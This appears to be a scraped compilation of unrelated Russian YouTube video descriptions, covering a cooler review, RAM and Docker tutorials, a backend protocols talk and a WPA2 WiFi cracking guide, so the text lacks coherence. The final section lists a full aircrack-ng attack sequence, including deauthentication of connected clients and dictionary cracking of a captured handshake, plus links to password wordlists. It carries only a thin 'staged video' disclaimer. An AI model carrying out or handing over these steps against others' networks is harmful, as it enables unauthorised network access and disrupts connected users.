Народ, сегодня мы познакомимся поближе, и разыграем, кулер Gelid Phantom Black.
Этот кулер, по праву, достоин называться — «бюджетный суперкулер». Вот такой алогизм!
Мне очень понравился, как сам кулер, так и цена на него.
Надеюсь, это видео будет полезно и поможет в выборе охлаждения, для вашего процессора.
Всем мир!
Длинное интервью с Ильясом Ахмедовым, сегодня поговорим о том, что лучше – Adobe Premiere Pro или Final Cut, подробнейший разбор наших тестов с Хакинтошем и многое многое другое!
Здравствуйте. Это видеоролик с рассуждениями об оперативной памяти от Пантелеева Владимира. Записано в феврале 2019 года в первую очередь для тех, кто задаёт однообразные вопросы в личку. Приятного просмотра.
Тайм-коды:
00:00
00:00:30 — Вступление
00:02:20 — Сколько оперативки нужно поставить?
00:05:21 — История об апгрейде компьютера заказчика
00:06:18 — В какие слоты ставить память?
00:08:35 — История про важность инструкций
00:13:25 — Про наличие и работу магазинов
00:15:13 — Какого производителя памяти выбрать?
00:17:00 — Любой разгон невозможно предугадать
00:18:48 — Сравнение с Инвокером (как это пришло мне в голову?)
00:19:40 — Про частоту
00:22:00 — Как разогнать?
00:24:30 — Про гарантию
00:25:25 — Какое напряжение выставить?
00:28:33 — DRAM Calculator
00:30:50 — Как тестировать память?
00:34:00 — Одноранговая или двухранговая память?
00:35:58 — Что такое модуль памяти?
00:42:05 — Какую память купить?
00:43:15 — Вопрос к подписчикам
А вы думали когда-нибудь приготовить что-то этакое с помощью докера?
В этом видео установим Docker, познакомимся с жизненный циклом докер контейнера и из простого докер рецепта (Docker file) приготовлю Docker image.
Большинство backend программ начинает свое сетевое общение с REST. По мере развития разработчику приходится отвечать на мелкие, но важные вопросы: как передавать дату и время, большие объемы данных, обеспечивать авторизацию и так далее.
Сетевые коммуникации в современном бэкенде — это множество конкурирующих протоколов, стандартов и подходов. У нас есть «REST», который каждый разработчик реализует по-своему, есть пересекающиеся JSON Schema и Open API, есть JSON API, GraphQL, gRPC, из-за угла выглядывает RAML.
В докладе Григорий рассказывает про современные подходы коммуникаций backend друг с другом и фронтендом, с какими сложностями мы боремся и что хорошего есть в нашем арсенале решений.
● В этом ролике я покажу, что ни одну WiFi сеть нельзя считать защищенной. Так как проверка моей сети показала то, что доступ к сети может получить кто угодно. В этом ролике я покажу, как я это сделал.
● Это постановочный ролик, не имеющий никакого отношения к реальной жизни. Всё происходящее в ролике — выполнено используя средства монтажа. Всё происходящее в ролике — творческая выдумка автора. Все действия придуманы, а любые наименования ПО — вымышленны. Любые сходства с реальностью — не более чем случайность. В реальной же жизни, любые подобные действия строго запрещены! Исключением является цель проверки системы на безопасность, получив одобрение владельца сети.
● Снял продолжение: брутфорс со скоростью до 500 000 тыс паролей в секунду используя видеокарту: goo.gl/HbDh8i
● Порядок команд:
— ifconfig
— airmon-ng check kill
— airmon-ng start wlan0
— airodump-ng wlan0mon
— airodump-ng --bssid [MAC адрес точки доступа – без скобок!] --channel 1 -w wifi wlan0mon
— aireplay-ng --deauth 20 -a [MAC точки доступа] -c [MAC подключенного клиента] wlan0mon
— wpaclean ИмяНовогоФайла ИмяСтарогоФайла
— aircrack-ng -w [ПутьКСловарю] -b [MAC точки доступа] [ЧистыйХэндшейк .cap]
● Набор словарей:
— goo.gl/z7mnhf — Даты, использовать первым
— goo.gl/4BBPQy — Номера Телефонов RUS, использовать вторым
— goo.gl/bVsfo2 — Элитный словарь от InsidePRO
— goo.gl/Ab2fTE — Дополнительный словарь на 9 млн. слов
— ● В ролике "{100%} Как взломать любой WiFi? | WPA2 | Kali Linux | Как защититься от взлома? | UnderMind" — я рассказываю об информационной безопасности. И о реальной уязвимости всех сетей. Существует множество способов получения доступа к сети WiFi, в том числе социальная инженерия или уязвимости в WPS, но об этом как-нибудь в другой раз. И сейчас поговорим о самом надежном (на мой взгляд) методе, который сработает со 100% вероятностью.
● Сама проверка у нас подразделяется на 2 части. Первая: это захват хендшейка или рукопожатия. В понятии WiFi сетей это что-то вроде «Привет, чувак. Подключи меня», «Привет. Какой пароль?», «Пароль: Блаблабла». Мы прослушиваем эти данные, но поскольку пароль передается в зашифрованном виде, мы переходим ко второму этапу. А именно: к расшифровке хендшейка.
Всё делать мы будем на Kali Linux.
Первой командой смотрим интерфейс нашего WiFi адаптера
ifconfig
Выбираем тот, который отвечает за WiFi, это как правило самый последний.
Переводим наш WiFi адаптер в режим монитора. В этом режиме он будет ловить все пакеты WiFi, даже предназначенные другим устройствам. Делаем это командой:
Продолжение в ролике…